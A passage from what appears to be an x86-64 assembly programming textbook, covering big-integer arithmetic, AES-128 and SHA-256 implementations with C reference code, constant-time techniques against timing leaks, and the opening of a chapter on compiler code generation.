    inc r8              ; INC and DEC leave CF intact
    dec rcx
    jnz .loop
    
.done:
    ; Return final carry
    setc al
    movzx eax, al
    pop rbp
    ret

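; bigint_sub.asm - Big integer subtraction
; RDI = destination, RSI = first, RDX = second, RCX = word count
; Computes first - second; returns borrow-out (0 or 1) in RAX
global bigint_sub

bigint_sub:
    push rbp
    mov rbp, rsp
    
    xor r8, r8          ; word index = 0
    test rcx, rcx       ; also clears CF for the first SBB
    jz .done
    
.loop:
    mov rax, [rsi + r8*8]
    sbb rax, [rdx + r8*8]      ; subtract second and borrow from previous word
    mov [rdi + r8*8], rax
    
    inc r8              ; INC and DEC leave CF intact
    dec rcx
    jnz .loop
    
.done:
    setc al             ; final borrow
    movzx eax, al
    pop rbp
    ret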
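
A portable C reference is useful for testing the assembly routine against known inputs. The sketch below propagates the carry word by word, least significant word first, which is what an ADC chain does in hardware; add_words is an illustrative name and not part of the library above.

```c
#include <stddef.h>
#include <stdint.h>

/* dst = a + b over n little-endian 64-bit words; returns the carry-out. */
static uint64_t add_words(uint64_t *dst, const uint64_t *a,
                          const uint64_t *b, size_t n) {
    uint64_t carry = 0;
    for (size_t i = 0; i < n; i++) {
        uint64_t sum = a[i] + b[i];
        uint64_t c = sum < a[i];   /* overflow of a[i] + b[i] */
        sum += carry;
        c |= sum < carry;          /* overflow when adding the incoming carry */
        dst[i] = sum;
        carry = c;
    }
    return carry;
}
```

Adding 1 to a two-word value of all ones yields two zero words and a carry-out of 1, which is a convenient first test case for both versions.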

Multiplication (Karatsuba)

// bigint_mul.c - Karatsuba multiplication
#include "bigint.h"

// Below this size the (n/2 + 1)-word sums would not shrink, so recursion stops
#define KARATSUBA_THRESHOLD 4

// Helper: dest += src << (64 * shift), carry propagates through dest
static void bigint_add_shifted(bigint_t *dest, const bigint_t *src, size_t shift) {
    uint64_t carry = 0;
    for (size_t i = shift; i < dest->size; i++) {
        uint64_t s = (i - shift < src->size) ? src->words[i - shift] : 0;
        uint64_t sum = dest->words[i] + s;
        uint64_t c = sum < s;
        sum += carry;
        carry = c | (sum < carry);
        dest->words[i] = sum;
    }
}

// Helper: dest -= src (requires dest >= src), borrow propagates through dest
static void bigint_sub_from(bigint_t *dest, const bigint_t *src) {
    uint64_t borrow = 0;
    for (size_t i = 0; i < dest->size; i++) {
        uint64_t s = (i < src->size) ? src->words[i] : 0;
        uint64_t d = dest->words[i];
        dest->words[i] = d - s - borrow;
        borrow = (d < s) | ((d == s) & borrow);
    }
}

// Helper: copy len words of src starting at start, zero-padded past src->size
static bigint_t* bigint_slice(const bigint_t *src, size_t start, size_t len) {
    bigint_t *r = bigint_new(len);
    for (size_t i = 0; i < len && start + i < src->size; i++) {
        r->words[i] = src->words[start + i];
    }
    return r;
}

// Base case: schoolbook multiplication (unsigned __int128 is a GCC/Clang extension)
static bigint_t* bigint_mul_school(const bigint_t *a, const bigint_t *b) {
    bigint_t *r = bigint_new(a->size + b->size);
    for (size_t i = 0; i < a->size; i++) {
        uint64_t carry = 0;
        for (size_t j = 0; j < b->size; j++) {
            unsigned __int128 t = (unsigned __int128)a->words[i] * b->words[j]
                                + r->words[i + j] + carry;
            r->words[i + j] = (uint64_t)t;
            carry = (uint64_t)(t >> 64);
        }
        r->words[i + b->size] = carry;
    }
    return r;
}

// Karatsuba multiplication
bigint_t* bigint_mul(bigint_t *a, bigint_t *b) {
    size_t n = (a->size > b->size) ? a->size : b->size;
    
    if (n < KARATSUBA_THRESHOLD) {
        return bigint_mul_school(a, b);
    }
    
    // Split into halves: low = m words, high = n - m words
    size_t m = n / 2;
    bigint_t *a_low = bigint_slice(a, 0, m);
    bigint_t *a_high = bigint_slice(a, m, n - m);
    bigint_t *b_low = bigint_slice(b, 0, m);
    bigint_t *b_high = bigint_slice(b, m, n - m);
    
    // Recursive multiplications
    bigint_t *z0 = bigint_mul(a_low, b_low);
    bigint_t *z2 = bigint_mul(a_high, b_high);
    
    // (a_low + a_high) * (b_low + b_high); the sums need one extra word
    bigint_t *a_sum = bigint_slice(a_low, 0, n - m + 1);
    bigint_t *b_sum = bigint_slice(b_low, 0, n - m + 1);
    bigint_add_shifted(a_sum, a_high, 0);
    bigint_add_shifted(b_sum, b_high, 0);
    bigint_t *z1 = bigint_mul(a_sum, b_sum);
    
    // z1 = z1 - z0 - z2
    bigint_sub_from(z1, z0);
    bigint_sub_from(z1, z2);
    
    // Combine: result = z0 + (z1 << m words) + (z2 << 2m words)
    bigint_t *result = bigint_new(2 * n);
    bigint_add_shifted(result, z0, 0);
    bigint_add_shifted(result, z1, m);
    bigint_add_shifted(result, z2, 2 * m);
    
    bigint_free(a_low); bigint_free(a_high);
    bigint_free(b_low); bigint_free(b_high);
    bigint_free(a_sum); bigint_free(b_sum);
    bigint_free(z0); bigint_free(z1); bigint_free(z2);
    
    return result;
}

Modular Exponentiation

; mod_exp.asm - Modular exponentiation (RSA-style)
; RDI = base, RSI = exponent, RDX = modulus (must be non-zero)
; Returns: (base^exponent) % modulus
global mod_exp

mod_exp:
    push rbp
    mov rbp, rsp
    push rbx
    push r12
    push r13
    
    mov r12, rdx        ; modulus
    mov rcx, rsi        ; exponent
    
    ; Reduce base first so every later quotient fits in 64 bits
    mov rax, rdi
    xor edx, edx
    div r12
    mov rbx, rdx        ; base = base % modulus
    mov r13, 1          ; result = 1
    
.exp_loop:
    test rcx, 1         ; check LSB of exponent
    jz .skip_mul
    
    ; result = (result * base) % modulus
    mov rax, r13
    mul rbx
    div r12
    mov r13, rdx        ; remainder becomes new result
    
.skip_mul:
    ; base = (base * base) % modulus
    mov rax, rbx
    mul rbx
    div r12
    mov rbx, rdx
    
    ; exponent >>= 1
    shr rcx, 1
    jnz .exp_loop
    
    mov rax, r13        ; return result
    pop r13
    pop r12
    pop rbx
    pop rbp
    ret
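
The square-and-multiply loop can be cross-checked against a C reference that uses a 128-bit intermediate product in place of the MUL/DIV register pair. The sketch below assumes a compiler that provides unsigned __int128 (GCC or Clang on a 64-bit target); mod_exp_ref is an illustrative name.

```c
#include <stdint.h>

/* (base ^ exp) % mod by right-to-left binary exponentiation; mod must be non-zero. */
static uint64_t mod_exp_ref(uint64_t base, uint64_t exp, uint64_t mod) {
    if (mod == 1)
        return 0;                 /* everything is 0 modulo 1 */
    uint64_t result = 1;
    base %= mod;                  /* keep operands below the modulus */
    while (exp) {
        if (exp & 1)
            result = (uint64_t)(((unsigned __int128)result * base) % mod);
        base = (uint64_t)(((unsigned __int128)base * base) % mod);
        exp >>= 1;
    }
    return result;
}
```

A classic check is 4^13 mod 497, which equals 445.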

Chapter 30: Implementing AES in Assembly

AES Round Structure

; aes.asm - AES-128 implementation
section .data
    ; AES S-box
    sbox:
    db 0x63,0x7c,0x77,0x7b,0xf2,0x6b,0x6f,0xc5,0x30,0x01,0x67,0x2b,0xfe,0xd7,0xab,0x76
    db 0xca,0x82,0xc9,0x7d,0xfa,0x59,0x47,0xf0,0xad,0xd4,0xa2,0xaf,0x9c,0xa4,0x72,0xc0
    db 0xb7,0xfd,0x93,0x26,0x36,0x3f,0xf7,0xcc,0x34,0xa5,0xe5,0xf1,0x71,0xd8,0x31,0x15
    db 0x04,0xc7,0x23,0xc3,0x18,0x96,0x05,0x9a,0x07,0x12,0x80,0xe2,0xeb,0x27,0xb2,0x75
    db 0x09,0x83,0x2c,0x1a,0x1b,0x6e,0x5a,0xa0,0x52,0x3b,0xd6,0xb3,0x29,0xe3,0x2f,0x84
    db 0x53,0xd1,0x00,0xed,0x20,0xfc,0xb1,0x5b,0x6a,0xcb,0xbe,0x39,0x4a,0x4c,0x58,0xcf
    db 0xd0,0xef,0xaa,0xfb,0x43,0x4d,0x33,0x85,0x45,0xf9,0x02,0x7f,0x50,0x3c,0x9f,0xa8
    db 0x51,0xa3,0x40,0x8f,0x92,0x9d,0x38,0xf5,0xbc,0xb6,0xda,0x21,0x10,0xff,0xf3,0xd2
    db 0xcd,0x0c,0x13,0xec,0x5f,0x97,0x44,0x17,0xc4,0xa7,0x7e,0x3d,0x64,0x5d,0x19,0x73
    db 0x60,0x81,0x4f,0xdc,0x22,0x2a,0x90,0x88,0x46,0xee,0xb8,0x14,0xde,0x5e,0x0b,0xdb
    db 0xe0,0x32,0x3a,0x0a,0x49,0x06,0x24,0x5c,0xc2,0xd3,0xac,0x62,0x91,0x95,0xe4,0x79
    db 0xe7,0xc8,0x37,0x6d,0x8d,0xd5,0x4e,0xa9,0x6c,0x56,0xf4,0xea,0x65,0x7a,0xae,0x08
    db 0xba,0x78,0x25,0x2e,0x1c,0xa6,0xb4,0xc6,0xe8,0xdd,0x74,0x1f,0x4b,0xbd,0x8b,0x8a
    db 0x70,0x3e,0xb5,0x66,0x48,0x03,0xf6,0x0e,0x61,0x35,0x57,0xb9,0x86,0xc1,0x1d,0x9e
    db 0xe1,0xf8,0x98,0x11,0x69,0xd9,0x8e,0x94,0x9b,0x1e,0x87,0xe9,0xce,0x55,0x28,0xdf
    db 0x8c,0xa1,0x89,0x0d,0xbf,0xe6,0x42,0x68,0x41,0x99,0x2d,0x0f,0xb0,0x54,0xbb,0x16
    
    ; Round constants
    rcon:
    db 0x01,0x02,0x04,0x08,0x10,0x20,0x40,0x80,0x1b,0x36

section .text
global aes_encrypt_block

; AES-128 encrypt one block
; RDI = input block (16 bytes)
; RSI = output block (16 bytes)
; RDX = round keys (176 bytes)
aes_encrypt_block:
    push rbp
    mov rbp, rsp
    push rbx
    push r12
    push r13
    push r14
    push r15
    
    ; Copy input to state (XMM0)
    movdqu xmm0, [rdi]
    
    ; Initial AddRoundKey
    movdqu xmm1, [rdx]
    pxor xmm0, xmm1
    
    ; 9 main rounds
    ; Loop state is kept in callee-saved registers so the helper
    ; routines may use RAX, RCX, RDX and RSI as scratch
    mov r12, 9          ; round counter
    lea r13, [rdx + 16] ; point to round key 1
    mov r14, rsi        ; output block
    
.round_loop:
    ; SubBytes - using lookup table
    call sub_bytes
    
    ; ShiftRows
    call shift_rows
    
    ; MixColumns
    call mix_columns
    
    ; AddRoundKey
    movdqu xmm1, [r13]
    pxor xmm0, xmm1
    
    add r13, 16         ; next round key
    dec r12
    jnz .round_loop
    
    ; Final round (no MixColumns)
    call sub_bytes
    call shift_rows
    
    ; Final AddRoundKey (R13 now points to round key 10)
    movdqu xmm1, [r13]
    pxor xmm0, xmm1
    
    ; Store result
    movdqu [r14], xmm0
    
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbx
    pop rbp
    ret

; SubBytes transformation
; Clobbers RAX, R8 and R9 only
sub_bytes:
    push rbp
    mov rbp, rsp
    sub rsp, 16
    and rsp, -16             ; movdqa needs a 16-byte aligned buffer
    
    ; Process each byte using S-box
    ; This is a simplified version - real implementation would use
    ; vectorized lookups or Galois field arithmetic
    
    ; For demonstration, using scalar code
    movdqa [rsp], xmm0       ; save on stack
    lea r9, [rel sbox]
    
    xor r8d, r8d
.loop:
    movzx eax, byte [rsp + r8]
    mov al, [r9 + rax]
    mov [rsp + r8], al
    inc r8
    cmp r8, 16
    jl .loop
    
    movdqa xmm0, [rsp]
    
    mov rsp, rbp
    pop rbp
    ret

; ShiftRows transformation
shift_rows:
    ; The state is column-major: byte i holds row (i mod 4), column (i / 4)
    ; Row 0: no shift
    ; Row 1: shift left 1
    ; Row 2: shift left 2
    ; Row 3: shift left 3
    
    ; One byte shuffle performs all four row rotations (requires SSSE3)
    pshufb xmm0, [rel shift_row_mask]
    ret

align 16                        ; pshufb needs a 16-byte aligned memory operand
shift_row_mask:
    db 0x00, 0x05, 0x0a, 0x0f   ; output column 0
    db 0x04, 0x09, 0x0e, 0x03   ; output column 1
    db 0x08, 0x0d, 0x02, 0x07   ; output column 2
    db 0x0c, 0x01, 0x06, 0x0b   ; output column 3

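; MixColumns transformation
; Each dword of XMM0 is one column (a0,a1,a2,a3), a0 in the low byte.
; Output byte i is xtime(a[i] ^ a[i+1]) ^ a[i+1] ^ a[i+2] ^ a[i+3],
; indices taken mod 4. All four columns are processed at once with SSE2.
; Clobbers XMM1-XMM4; no general-purpose registers are touched.
mix_columns:
    movdqa xmm1, xmm0
    movdqa xmm2, xmm0
    psrld xmm1, 8
    pslld xmm2, 24
    por xmm1, xmm2          ; xmm1 = (a1,a2,a3,a0)
    
    movdqa xmm2, xmm0
    movdqa xmm3, xmm0
    psrld xmm2, 16
    pslld xmm3, 16
    por xmm2, xmm3          ; xmm2 = (a2,a3,a0,a1)
    
    movdqa xmm3, xmm0
    movdqa xmm4, xmm0
    psrld xmm3, 24
    pslld xmm4, 8
    por xmm3, xmm4          ; xmm3 = (a3,a0,a1,a2)
    
    pxor xmm0, xmm1         ; a[i] ^ a[i+1]
    
    ; xtime function (multiply by 2 in GF(2^8)) on all 16 bytes
    pxor xmm4, xmm4
    pcmpgtb xmm4, xmm0      ; 0xFF in every byte whose top bit is set
    paddb xmm0, xmm0        ; shift each byte left by one
    pand xmm4, [rel xtime_poly]
    pxor xmm0, xmm4         ; reduce by 0x1b where the top bit was set
    
    pxor xmm0, xmm1
    pxor xmm0, xmm2
    pxor xmm0, xmm3
    ret

align 16
xtime_poly:
    times 16 db 0x1b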
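
The MixColumns arithmetic is easier to follow on a single column. The sketch below shows xtime and the column mix in C; the function names are illustrative and do not come from the listing above.

```c
#include <stdint.h>

/* Multiply by 2 in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1, branch-free:
   -(a >> 7) is all ones exactly when the top bit of a is set. */
static uint8_t xtime(uint8_t a) {
    return (uint8_t)((a << 1) ^ (0x1b & -(a >> 7)));
}

/* MixColumns on one 4-byte column, in place.
   Uses 2*a0 ^ 3*a1 ^ a2 ^ a3 == xtime(a0 ^ a1) ^ a1 ^ a2 ^ a3. */
void mix_column(uint8_t col[4]) {
    uint8_t a0 = col[0], a1 = col[1], a2 = col[2], a3 = col[3];
    uint8_t t = (uint8_t)(a0 ^ a1 ^ a2 ^ a3);
    col[0] = (uint8_t)(a0 ^ t ^ xtime((uint8_t)(a0 ^ a1)));
    col[1] = (uint8_t)(a1 ^ t ^ xtime((uint8_t)(a1 ^ a2)));
    col[2] = (uint8_t)(a2 ^ t ^ xtime((uint8_t)(a2 ^ a3)));
    col[3] = (uint8_t)(a3 ^ t ^ xtime((uint8_t)(a3 ^ a0)));
}
```

With the commonly quoted test column db 13 53 45, mix_column produces 8e 4d a1 bc.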

Key Expansion

; AES-128 Key Expansion
; RDI = key (16 bytes)
; RSI = round keys buffer (176 bytes)
global aes_key_expansion

aes_key_expansion:
    push rbp
    mov rbp, rsp
    push rbx
    push r12
    
    ; Copy original key to first 16 bytes
    mov rcx, 4
    xor rbx, rbx
.copy_key:
    mov eax, [rdi + rbx*4]
    mov [rsi + rbx*4], eax
    inc rbx
    loop .copy_key
    
    ; Generate remaining round keys
    xor r12d, r12d      ; round index 0..9, also the Rcon index
    mov rbx, 4          ; word index
    lea r9, [rel rcon]
    
.key_exp_loop:
    ; Get previous word (bytes b0..b3 sit little-endian in EAX)
    mov eax, [rsi + rbx*4 - 4]
    
    ; RotWord: (b0,b1,b2,b3) -> (b1,b2,b3,b0), which is a right
    ; rotate of the little-endian dword
    ror eax, 8
    
    ; SubWord
    call sub_word
    
    ; XOR Rcon into the first byte of the word
    xor al, [r9 + r12]
    
    ; XOR with word from 4 positions back
    xor eax, [rsi + rbx*4 - 16]
    
    ; Store
    mov [rsi + rbx*4], eax
    inc rbx
    
    ; Generate remaining 3 words of this round
    mov r8, 3
.gen_word:
    mov eax, [rsi + rbx*4 - 4]
    xor eax, [rsi + rbx*4 - 16]
    mov [rsi + rbx*4], eax
    inc rbx
    dec r8
    jnz .gen_word
    
    inc r12
    cmp r12, 10         ; 10 rounds
    jl .key_exp_loop
    
    pop r12
    pop rbx
    pop rbp
    ret

; Substitute each byte of EAX using S-box
; Clobbers RCX, RDX and R10
sub_word:
    lea r10, [rel sbox]
    mov ecx, 4
.next_byte:
    movzx edx, al
    mov al, [r10 + rdx]
    ror eax, 8          ; next byte into AL; four rotations restore the order
    dec ecx
    jnz .next_byte
    ret
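
The direction of the RotWord rotate depends on how the four key bytes are packed into a register. A small sketch, assuming the word was loaded little-endian as on x86 (rot_word_le is a hypothetical name):

```c
#include <stdint.h>

/* RotWord for a key word held as a little-endian dword.
   Bytes in memory order (b0,b1,b2,b3) become (b1,b2,b3,b0), which is a
   rotate RIGHT by 8 bits of the 32-bit value b3<<24 | b2<<16 | b1<<8 | b0. */
uint32_t rot_word_le(uint32_t w) {
    return (w >> 8) | (w << 24);
}
```

The last word of the FIPS-197 example key has bytes 09 cf 4f 3c, which load as 0x3c4fcf09. After the rotate the value is 0x093c4fcf, that is, bytes cf 4f 3c 09 in memory order.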

Chapter 31: SHA Implementation

SHA-256 Constants

; sha256.asm - SHA-256 implementation
section .data
    ; SHA-256 initial hash values
    h0 dd 0x6a09e667
    h1 dd 0xbb67ae85
    h2 dd 0x3c6ef372
    h3 dd 0xa54ff53a
    h4 dd 0x510e527f
    h5 dd 0x9b05688c
    h6 dd 0x1f83d9ab
    h7 dd 0x5be0cd19
    
    ; SHA-256 round constants
    k:
    dd 0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5
    dd 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5
    dd 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3
    dd 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174
    dd 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc
    dd 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da
    dd 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7
    dd 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967
    dd 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13
    dd 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85
    dd 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3
    dd 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070
    dd 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5
    dd 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3
    dd 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208
    dd 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2

section .text
global sha256_transform

; SHA-256 transform function
; RDI = state (8 dwords)
; RSI = block (64 bytes)
sha256_transform:
    push rbp
    mov rbp, rsp
    push rbx
    push r12
    push r13
    push r14
    push r15
    sub rsp, 264        ; w[0..63] (256 bytes) + 8 to keep RSP 16-byte aligned
    
    ; Initialize working variables a-h
    ; (EAX, EBX and EDX stay free as scratch; RCX holds t)
    mov r8d,  [rdi]     ; a
    mov r9d,  [rdi+4]   ; b
    mov r10d, [rdi+8]   ; c
    mov r11d, [rdi+12]  ; d
    mov r12d, [rdi+16]  ; e
    mov r13d, [rdi+20]  ; f
    mov r14d, [rdi+24]  ; g
    mov r15d, [rdi+28]  ; h
    
    ; Copy block to w[0..15] (big-endian to host)
    xor ecx, ecx
.prep_loop:
    mov eax, [rsi + rcx*4]
    bswap eax            ; convert from big-endian
    mov [rsp + rcx*4], eax
    inc rcx
    cmp rcx, 16
    jl .prep_loop
    
    lea rsi, [rel k]     ; block pointer is no longer needed
    
    ; Main loop: for t = 0 to 63
    xor ecx, ecx         ; t = 0
.main_loop:
    ; Prepare message schedule for t >= 16
    cmp rcx, 16
    jl .skip_schedule
    
    ; w[t] = sigma1(w[t-2]) + w[t-7] + sigma0(w[t-15]) + w[t-16]
    mov eax, [rsp + rcx*4 - 8]      ; w[t-2]
    call sigma1
    mov ebx, eax
    add ebx, [rsp + rcx*4 - 28]     ; w[t-7]
    mov eax, [rsp + rcx*4 - 60]     ; w[t-15]
    call sigma0
    add ebx, eax
    add ebx, [rsp + rcx*4 - 64]     ; w[t-16]
    mov [rsp + rcx*4], ebx
    
.skip_schedule:
    ; T1 = h + Sigma1(e) + Ch(e,f,g) + k[t] + w[t]
    mov eax, r12d
    call Sigma1
    mov ebx, eax
    add ebx, r15d        ; + h
    
    ; Ch(e,f,g) = (e & f) ^ (~e & g)
    mov eax, r12d
    and eax, r13d
    mov edx, r12d
    not edx
    and edx, r14d
    xor eax, edx
    add ebx, eax
    
    add ebx, [rsi + rcx*4] ; + k[t]
    add ebx, [rsp + rcx*4] ; + w[t]; T1 is now in EBX
    
    ; Update e-h while d is still intact
    mov r15d, r14d       ; h = g
    mov r14d, r13d       ; g = f
    mov r13d, r12d       ; f = e
    mov r12d, r11d
    add r12d, ebx        ; e = d + T1
    
    ; Maj(a,b,c) = (a & b) ^ (a & c) ^ (b & c)
    mov eax, r8d
    and eax, r9d
    mov edx, r8d
    and edx, r10d
    xor eax, edx
    mov edx, r9d
    and edx, r10d
    xor eax, edx
    add ebx, eax         ; T1 + Maj(a,b,c)
    
    ; T2 = Sigma0(a) + Maj(a,b,c)
    mov eax, r8d
    call Sigma0
    add ebx, eax         ; T1 + T2
    
    ; Update a-d
    mov r11d, r10d       ; d = c
    mov r10d, r9d        ; c = b
    mov r9d, r8d         ; b = a
    mov r8d, ebx         ; a = T1 + T2
    
    inc rcx
    cmp rcx, 64
    jl .main_loop
    
    ; Add results to state
    add [rdi], r8d
    add [rdi+4], r9d
    add [rdi+8], r10d
    add [rdi+12], r11d
    add [rdi+16], r12d
    add [rdi+20], r13d
    add [rdi+24], r14d
    add [rdi+28], r15d
    
    lea rsp, [rbp - 40]  ; drop w[] and point at the saved registers
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbx
    pop rbp
    ret

; The four helpers take their input in EAX, return in EAX, clobber EDX

; Sigma0(x) = ROTR2(x) ^ ROTR13(x) ^ ROTR22(x)
Sigma0:
    mov edx, eax
    ror eax, 2
    ror edx, 13
    xor eax, edx
    ror edx, 9           ; 13 + 9 = 22
    xor eax, edx
    ret

; Sigma1(x) = ROTR6(x) ^ ROTR11(x) ^ ROTR25(x)
Sigma1:
    mov edx, eax
    ror eax, 6
    ror edx, 11
    xor eax, edx
    ror edx, 14          ; 11 + 14 = 25
    xor eax, edx
    ret

; sigma0(x) = ROTR7(x) ^ ROTR18(x) ^ SHR3(x) (for message schedule)
sigma0:
    mov edx, eax
    shr eax, 3
    ror edx, 7
    xor eax, edx
    ror edx, 11          ; 7 + 11 = 18
    xor eax, edx
    ret

; sigma1(x) = ROTR17(x) ^ ROTR19(x) ^ SHR10(x) (for message schedule)
sigma1:
    mov edx, eax
    shr eax, 10
    ror edx, 17
    xor eax, edx
    ror edx, 2           ; 17 + 2 = 19
    xor eax, edx
    ret
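
A C reference for the compression function makes it possible to check the assembly output word by word. The sketch below follows the same steps; sha256_transform_ref, K256 and rotr32 are names chosen here, and padding is left to the caller.

```c
#include <stdint.h>

static const uint32_t K256[64] = {
    0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,
    0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,
    0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,
    0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,
    0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,
    0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,
    0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,
    0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2
};

static uint32_t rotr32(uint32_t x, unsigned n) {   /* valid for 0 < n < 32 */
    return (x >> n) | (x << (32 - n));
}

/* Updates state[8] with one already padded 64-byte block. */
void sha256_transform_ref(uint32_t state[8], const uint8_t block[64]) {
    uint32_t w[64];
    for (int t = 0; t < 16; t++)                   /* big-endian load */
        w[t] = ((uint32_t)block[4*t] << 24) | ((uint32_t)block[4*t + 1] << 16) |
               ((uint32_t)block[4*t + 2] << 8) | (uint32_t)block[4*t + 3];
    for (int t = 16; t < 64; t++) {
        uint32_t s0 = rotr32(w[t-15], 7) ^ rotr32(w[t-15], 18) ^ (w[t-15] >> 3);
        uint32_t s1 = rotr32(w[t-2], 17) ^ rotr32(w[t-2], 19) ^ (w[t-2] >> 10);
        w[t] = s1 + w[t-7] + s0 + w[t-16];
    }
    uint32_t a = state[0], b = state[1], c = state[2], d = state[3];
    uint32_t e = state[4], f = state[5], g = state[6], h = state[7];
    for (int t = 0; t < 64; t++) {
        uint32_t S1 = rotr32(e, 6) ^ rotr32(e, 11) ^ rotr32(e, 25);
        uint32_t ch = (e & f) ^ (~e & g);
        uint32_t t1 = h + S1 + ch + K256[t] + w[t];
        uint32_t S0 = rotr32(a, 2) ^ rotr32(a, 13) ^ rotr32(a, 22);
        uint32_t maj = (a & b) ^ (a & c) ^ (b & c);
        uint32_t t2 = S0 + maj;
        h = g; g = f; f = e; e = d + t1;
        d = c; c = b; b = a; a = t1 + t2;
    }
    state[0] += a; state[1] += b; state[2] += c; state[3] += d;
    state[4] += e; state[5] += f; state[6] += g; state[7] += h;
}
```

Feeding it the initial hash values and the single padded block for the message "abc" should give a state whose first word is 0xba7816bf, matching the published SHA-256 test vector.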

Chapter 32: Constant-Time Programming

Why Constant-Time?

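Cryptographic code must avoid timing side channels: if execution time or the memory access pattern depends on secret data, an attacker who can measure it may recover that data.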

Vulnerable Code

// Timing leaks! Different paths take different time
int check_password(const char *user, const char *expected, int len) {
    for (int i = 0; i < len; i++) {
        if (user[i] != expected[i]) {
            return 0;  // Early exit leaks the position of the first mismatch
        }
    }
    return 1;
}

Constant-Time Comparison

; constant_time_cmp.asm - Compare without early exit
; RDI = buffer1, RSI = buffer2, RDX = length
; Returns 0 if equal, non-zero if different
global constant_time_cmp

constant_time_cmp:
    push rbp
    mov rbp, rsp
    
    xor rax, rax        ; result = 0
    xor rcx, rcx        ; counter
    
    test rdx, rdx       ; zero length: nothing to read
    jz .done
    
.loop:
    ; Load bytes
    movzx r8, byte [rdi + rcx]
    movzx r9, byte [rsi + rcx]
    
    ; XOR and OR into result
    xor r8, r9
    or rax, r8
    
    inc rcx
    cmp rcx, rdx
    jb .loop            ; unsigned compare: the length is a size
    
.done:
    ; Return (0 if all bytes equal)
    pop rbp
    ret
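
The same idea can be written in C, with the caveat that a compiler is free to restructure the loop, so the generated assembly should be inspected before relying on it. A minimal sketch (ct_compare is a hypothetical name):

```c
#include <stddef.h>
#include <stdint.h>

/* Returns 0 if the buffers are equal, nonzero otherwise.
   Every byte is visited regardless of where the first mismatch is.
   The volatile qualifier is a hint against early-exit optimizations,
   not a guarantee. */
int ct_compare(const void *a, const void *b, size_t len) {
    const volatile uint8_t *pa = (const volatile uint8_t *)a;
    const volatile uint8_t *pb = (const volatile uint8_t *)b;
    uint8_t diff = 0;
    for (size_t i = 0; i < len; i++) {
        diff |= (uint8_t)(pa[i] ^ pb[i]);
    }
    return diff;
}
```

Only the length influences the running time here, and the length is normally public.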

Constant-Time Select

; constant_time_select.asm - Choose between two values without branching
; RDI = condition (0 or 1), RSI = val_if_true, RDX = val_if_false
; Returns selected value
global constant_time_select

constant_time_select:
    ; Create mask: if condition, mask = 0xFFFFFFFFFFFFFFFF
    neg rdi
    sbb rdi, rdi
    
    ; (mask & val_if_true) | (~mask & val_if_false)
    mov rax, rdi
    and rax, rsi
    not rdi
    and rdi, rdx
    or rax, rdi
    ret
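
A C rendering of the mask trick, offered as a sketch rather than a guaranteed constant-time routine, since the compiler decides the final instruction sequence (ct_select is a hypothetical name):

```c
#include <stdint.h>

/* Returns if_true when cond is nonzero, if_false otherwise, without a
   data-dependent branch in the source.
   (cond | -cond) has its top bit set exactly when cond != 0. */
uint64_t ct_select(uint64_t cond, uint64_t if_true, uint64_t if_false) {
    uint64_t nonzero = (cond | (0 - cond)) >> 63;   /* 0 or 1 */
    uint64_t mask = 0 - nonzero;                    /* 0 or all ones */
    return (mask & if_true) | (~mask & if_false);
}
```

Like the NEG/SBB pair above, this treats any nonzero condition as true, not only the value 1.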

Constant-Time AES S-box

; constant_time_sbox.asm - S-box lookup without cache timing leaks
; Using bit-sliced implementation or vector permutations

; Example: bit-sliced AES S-box (simplified)
; This implementation avoids table lookups
bit_sliced_sbox:
    ; Convert byte to bits in separate registers
    ; Compute S-box using Boolean expressions
    ; This is constant-time but complex
    
    ; Simplified version using SSE shuffles
    ; (still may leak through cache)
    
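    ; Better: use AES-NI instructions. Note that AESENC performs a full
    ; round (ShiftRows, SubBytes, MixColumns, XOR with the round key in
    ; XMM1), not a bare S-box lookup
    aesenc xmm0, xmm1    ; hardware AES is constant-time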
    ret

PART XII — Compiler & Code Generation

Chapter 33: How Compilers Generate Assembly

Compilation Pipeline

Source Code (C/C++)
    ↓
Lexical Analysis (tokenization)
    ↓
Parsing (AST construction)
    ↓
Semantic Analysis
    ↓
Intermediate Representation (IR)
    ↓
Optimization
    ↓
Code Generation
    ↓
Assembly
    ↓
Object Code

Example: Simple Expression

// Original C
int add(int a, int b) {
    return a + b;
}

Compiler-Generated Assembly (unoptimized)

add:
    push rbp
    mov rbp, rsp
    mov DWORD PTR [rbp-4], edi
    mov DWORD PTR [rbp-8], esi
